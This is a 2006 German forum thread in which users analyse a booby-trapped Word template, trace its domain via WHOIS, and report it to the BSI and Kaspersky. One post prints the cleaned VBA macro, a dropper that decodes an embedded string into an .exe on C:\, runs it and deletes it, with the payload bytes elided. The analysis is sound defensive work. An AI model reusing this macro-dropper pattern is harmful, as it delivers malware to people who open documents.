PDA

Vollständige Version anzeigen : Virus oder was ?


ingod
29.08.2006, 20:08
Hallo,
bin heute durch einen link auf die Seite vorlagens.info gekommen.
Was die da zum Download anbieten ist eine .doc Datei.
Zum glück hab ich sie ohne Macros gestartet, denn der VBA-Code riecht verdammt nach Virus oder sowas.
Falls sich jemand so richtig mit VBA auskennt sollte er sich das vielleicht mal ansehen und hier evtl. posten was das Macro macht, denn der Code ist mir ein wenig unheimlich.
Aber bitte nur Leute die wissen was sie tun, nicht das hier sich jemand was einfängt.

Grüsse
Ingo

peppi
29.08.2006, 22:01
Hallo Ingo,

Du glaubst jetzt aber nicht im Ernst, daß sich hier jemand die Mühe macht, und alle Downloads durchsucht, oder? Vielleicht solltest Du einen direkten Link zu der Datei einfügen, die Du meinst...

ingod
29.08.2006, 22:42
Hallo,
alle Download-Links verweisen auf die gleiche Datei.
Hab ich vergessen zu erwähnen. .-)

Würde ja reichen wenn sich jemand mal die eingebetteten Macros die automatisch starten ansieht. Für einen VBA-Profi sicher sofort als Virus zu erkennen wenn es denn ein Virus ist.
Hab bei Google nichts über diese Seite finden können, also muss das wohl sehr neu sein.

Grüsse
Ingo

ingod
29.08.2006, 23:59
Hallo,
hab mir den MacroCode mal selbst angesehen.
Kenne mich zwar mit VBA nicht so gut aus, aber ich bin zu folgendem Ergebnis gekommen. Bitte korrigiert mich wenn ich falsch liege oder hab ich schon Viren-Verfolgungswahn ?

1. bastelt dieses Script aus dem ganzen Zeichensalat eine .exe Datei auf C:\ zusammen.
2. führt es diese Datei dann aus.
3. löscht es diese Datei dann.

Sieht nicht gut aus. .-(

Was sagt Ihr dazu ?

Grüsse
Ingo

Hotte
30.08.2006, 01:17
Hi,

was soll man davon halten....

Was er auch immer genau macht - auf jeden Fall löscht er das Modul in dem Dokument, wo die Exe-Datei angelegt wird. Er beseitigt also selbst seine eigenen "Spuren".

Auf die Schnelle habe ich noch gesehen, dass API-Funktionen ausgeführt werden, die offensichtlich das Handling auf Systemprozesse setzt, die bereits aktiv sind.

Die Datei sollte man genauer überprüfen...

Auffällig ist an dem Code noch, dass offensichtlich versucht wird, das eigentliche Schreiben der Exe-Datei (welcher Inmhalt genau...) durch zusätzliche Variablen "verschleiert" werden soll. Ein etwas komisches Verhalten...und noch dazu so durchsichtig und einfach gestrickt.

Die erzeugte Datei wird nicht als "Virus verseucht" erkannt - ob mit der Ausführung der Datei ein Virus "produziert" wird kann ich nicht sagen.

Auf jeden Fall eines:

Auf keinen Fall die Datei einfach öffnen!
Dann wird der Prozess automatisch ausgeführt....

<< dp >>
30.08.2006, 09:51
Wie seit ihr eigentlich an den Code herangekommen. Wenn ich im VBA-Editor den Code öffnen möchte, fragt er nach einem Passwort :boah:

ingod
30.08.2006, 10:14
Hi,

ich habs mit OpenOffice geöffnet, da fragt keiner nach nem Passwort. :-))

Grüsse
Ingo

peppi
30.08.2006, 10:16
Hallo,

es handelt sich übrigens um das Trojanische Pferd Trojan-Dropper.MSWord.Agent.e. - wie mein Kaspersky festgestellt hat... Offensichtlich relativ neu (23.8.2006)??

@Daniel,
gibt es eigentlich irgendeine Stelle, bei der man diese Seite melden kann, damit sie schnellstens abgeschaltet wird?

ingod
30.08.2006, 10:23
Für diejenigen die sich das mal anschauen möchten ohne ein Sicherheitsrisiko.
Hier mal die Macros als .txt Dateien.

Grüsse
Ingo

Hotte
30.08.2006, 10:34
Hi,

nur zur weiteren Information:

die Worddatei ist nach Kaspersky mit dem Virus "Trojan-Dropper.MSWord.Agent.e." verseucht.

Dies kann hier online überprüft werden:

http://www.kaspersky.com/de/scanforvirus

Außerdem kommt diese Seite nach meiner kleinen (nocht vollständigen) Recherche nicht aus dem deutschsprachigen Raum - sondern mehr aus dem Osteuropäischem (Russland). Ich denke nicht, dass die dort Vorlagen bereitstellen wollen! Das mag aber jeder für sich entscheiden...

Ich kann nur sagen: Finger weg!
Nach dem 1. Starten ist sie aber völlig harmlos, da bereits alles passiert ist und dei erstellte Exe-Datei auch wieder gelöscht wurde.

Mal sehen, ob man noch herausfinden kann, was die Datei dann genau mit dem System macht.

<< dp >>
30.08.2006, 10:41
@ ingod:
Interessanter Code...

@ peppi:
WhoIs liefert folgendes Ergebnis:

Domain ID:D14408600-LRMS
Domain Name:VORLAGENS.INFO
Created On:16-Aug-2006 17:52:01 UTC
Last Updated On:16-Aug-2006 17:52:04 UTC
Expiration Date:16-Aug-2007 17:52:01 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:DI_3707530
Registrant Name:Vor Lagen
Registrant Organization:n/a
Registrant Street1:n/a
Registrant Street2:n/a
Registrant Street3:n/a
Registrant City:n/a
Registrant State/Province:
Registrant Postal Code:000000
Registrant Country:US
Registrant Phone:+999.999999999
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:vorlages@yahoo.com
Admin ID:DI_3707530
Admin Name:Vor Lagen
Admin Organization:n/a
Admin Street1:n/a
Admin Street2:n/a
Admin Street3:n/a
Admin City:n/a
Admin State/Province:
Admin Postal Code:000000
Admin Country:US
Admin Phone:+999.999999999
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:vorlages@yahoo.com
Billing ID:DI_3707530
Billing Name:Vor Lagen
Billing Organization:n/a
Billing Street1:n/a
Billing Street2:n/a
Billing Street3:n/a
Billing City:n/a
Billing State/Province:
Billing Postal Code:000000
Billing Country:US
Billing Phone:+999.999999999
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:vorlages@yahoo.com
Tech ID:DI_3707530
Tech Name:Vor Lagen
Tech Organization:n/a
Tech Street1:n/a
Tech Street2:n/a
Tech Street3:n/a
Tech City:n/a
Tech State/Province:
Tech Postal Code:000000
Tech Country:US
Tech Phone:+999.999999999
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:vorlages@yahoo.com
Name Server:NS1.MCHOST.RU
Name Server:NS2.MCHOST.RU
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:

Am besten wäre es, wenn wir die Domain beim Hoster Public Domain Registry (http://www.publicdomainregistry.com) melden bzw. mal deren Support fragen. Bei solchen Geschichten dürften die ziemlich schnell reagieren. Wer hat Lust, einen englischen Brief (Mail) zu verfassen :grins:

peppi
30.08.2006, 10:45
Hallo Daniel,

Wer hat Lust, einen englischen Brief (Mail) zu verfassen
... Du natürlich, oder :grins: :) :D ???

ingod
30.08.2006, 10:48
Hallo,
hab mal Module1 etwas übersichtlicher gestaltet und von Müll befreit.
So interessant ist der Code dann gar nicht mehr.

--------------------------------------------------------------------
Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Sub Module1

Sub Trojan()
On Error Resume Next

DATA = "ENFKJAAAADAAAAAAAEAAAAAAPPPPAAAALIAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA"
DATA = DATA + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAOBPLKAOAALEAJMNCBLIABEMMNCBFEGIGJ HDCAHAHCGPGHHC"
.
.
.
DATA = DATA + "HFPDJBJBJBJBFAEJIBPJLOAAAAAAFJFIEAFAFIEIFAGILEBCAEBDMDFPILMHPPOAFJEAAAHBBMEAAAPA PIBCAAPIADAAAANIDKEAAACIEABEAADADKEAAAGIGKNJHDPA"
DATA = DATA + "PI"

Dim MqLo As String
For ZZ = 1 To Len(DATA) Step 2
MqLo = MqLo + Chr((Asc(Mid(DATA, ZZ, 1)) - 65) * 16 + ((Asc(Mid(DATA, ZZ + 1, 1)) - 65)))
Next ZZ

ExeFName = "C:\KdxKCrVGLRV.EXe"


Open ExeFName For Binary As 1

Put #1, , MqLo

Close #1
Shell ExeFName, vbNormalFocus
Kill ExeFName
End Sub

End Sub
-----------------------------------------------------------------------


Grüsse
Ingo

Hotte
30.08.2006, 10:50
Hi @all,

Name Server:NS1.MCHOST.RU
=russisch..... ;)

_Die Frage ist, wie lange solche Seiten überhaupt geschaltet werden - und wer weiß, wieviele Seiten es noch gibt, wo diese Datei (o.ä.) verbreitet wird...

<< dp >>
30.08.2006, 10:53
Ich habe jetzt auch nochmal etwas nachgeforscht; der Server scheint tatsächlich aus Russland zu kommen. Die Domain wurde am 16.08 unter falschen Angaben erstellt. Mehr Infos hierzu findet man mit der WhoIs-Abfrage (http://www.publicdomainregistry.com/whois-process/) von "Public Domain Registry". Eine offizielle Stelle zum melden scheint es nicht zu geben. Ich schreibe mal eine Mail ans BSI - die wissen bestimmt, was man da machen muss...

[edit]
E-Mail ist raus. Ich melde mich dann, wenn ich was vom BSI höre :mrcool:

Hotte
30.08.2006, 10:53
@Ingo:

da hats du die falsche Variable genommen - der Code der exe-Datei steht in "JACQ"... Alles Andere (auch "Data") sind "blinde" Variablen, die nichts machen.
Dann wird der Inhalt dieser Variablen in einen Ascci-Code umgewandelt..und das Alles nimmt seinen Lauf.

[EDIT] ---den Variablennamen geändert in "JACQ"...

<< dp >>
31.08.2006, 13:30
So, das BSI hat sich gerade eben gemeldet:

Sollten alle Klärungsversuche mit dem Domaininhaber scheitern
ist es hier eventuell angebracht sich von einem
Rechtsanwalt beraten zu lassen oder die Rechtspflege
der Amtsgerichte in Anspruch zu nehmen. Vielleicht müssen
Sie sich die Durchsetzung Ihrer Forderung über Gerichte erstreiten.
Leider kann das BSI hier nicht erschöpfend Auskunft geben, da wir keine
Rechtsberatungen durchführen dürfen (Siehe Rechtsberatungsgesetz).
Informationen über Recht im Internet finden Sie aber hier:
http://www.bsi-fuer-buerger.de/recht/index.htm

Sollten Sie den Verdacht haben,
das eine Straftat vorliegt, ist es notwendig den Weg über die
Strafverfolgungsbehörden zu gehen. Wenden Sie sich dazu an die
für Sie zuständigen örtlich Polizeidienstelle
(Strafverfolgungsbehörde). Informationen zu Recht im
Internet und erstatten einer Anzeige finden Sie hier:
http://www.bsi-fuer-buerger.de/recht/rechtsprobleme.htm
http://www.bsi-fuer-buerger.de/recht/tipps_gesetze.htm

Auch bietet die Polizei des Bundeslands Nordrhein Westfalen
eine Möglichkeit zur Online-Anzeige. Aufgrund der
dezentralen Strukturierung der Polizei ist diese
Bundesland eventuell nicht unmittelbar zuständig,
jedoch muß die Polizei dort den Vorgang weiterleiten:
https://service.polizei.nrw.de/egovernment/service/anzeige.html

Ebenso hat der Verband "Deutschland sicher im Netz" eine
neue Beschwerdestelle im Internet eingerichtet, bei
der Nutzer illegale Angebote im Netz schnell und
unbürokratisch melden können. Unter
www.internet-beschwerdestelle.de können
Anwender E-Mails mit verdächtigen Inhalten angeben,
die von Rechtsexperten geprüft werden. In
Verdachtsfällen werden dann entsprechende
Maßnahmen ergriffen.
Übrigens hat der russische Hoster die Seite bereits vom Netz genommen. Sprich die Punkte, die das BSI nennt, sind für spätere Meldungen ganz hilfreich. Vor allem der Tipp mit der Internet-Beschwerdestelle ist sehr gut. Hat einer von euch eine Meldung an den Hoster geschrieben oder war da jemand schneller als wir? BTW das Gute gewinnt immer :grins:

peppi
31.08.2006, 13:41
Hallo Daniel,

ich hab nix gemacht, hatte aber bei meinen Recherchen auch einen Eintrag in einem php-Forum gefunden. Vielleicht haben die es an den geeigneten Stellen gemeldet.

Aber der Link zur Internet-Beschwerdestelle ist schon einmal sehr gut, und ist auch gleich in meine Favoriten gewandert :grins: ....

Danke für Deine Mühe...

ingod
01.09.2006, 09:08
@Hotte,
ich weiss dass die Variable JACQ heisst, aber wegen der übersichtlichkeit jage ich immer erst die suchen/ersetzen funktion über so einen code und gebe den Variablen aussagekräftigere Namen. :-)

Habe auch Antwort von Kaspersky bekommen denen hatte ich die .doc und die erzeugte .exe geschickt.

-------------------------------------------------------------
Hello
New detection has been added
Detection will be avaliable in an hour
This is Trojan-Downloader.Win32.Small.dpy

Regards, Chugunov Evgeniy
Virus Analyst, Kaspersky Lab.
Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com <http://www.viruslist.com>
> > Attachment: KdxKCrVGLRV.EXe
> > Attachment: doc02-72.doc
----------------------------------------------------------------

Allerdings konnte ich noch nicht rausbekommen was dieser Trojan-Downloader
denn tatsächlich downloadet.

Grüsse
Ingo

J_Eilers
01.09.2006, 10:51
Hi,

wirst du wohl auch nicht mitbekommen, wenn der gerade erst aufgenommen wurde ;) In der Regel laden die sich von lycos oder .ru Seiten Dateien runter und speichern persönliche Informationen, ändern IE-Einstellungen und ganz im allgemeinen öffnen sie Hintertüren. Einfach mal in der Viruslist schauen, dort sind mehrere Varianten gelistet und dieser wird nur minimal abweichen.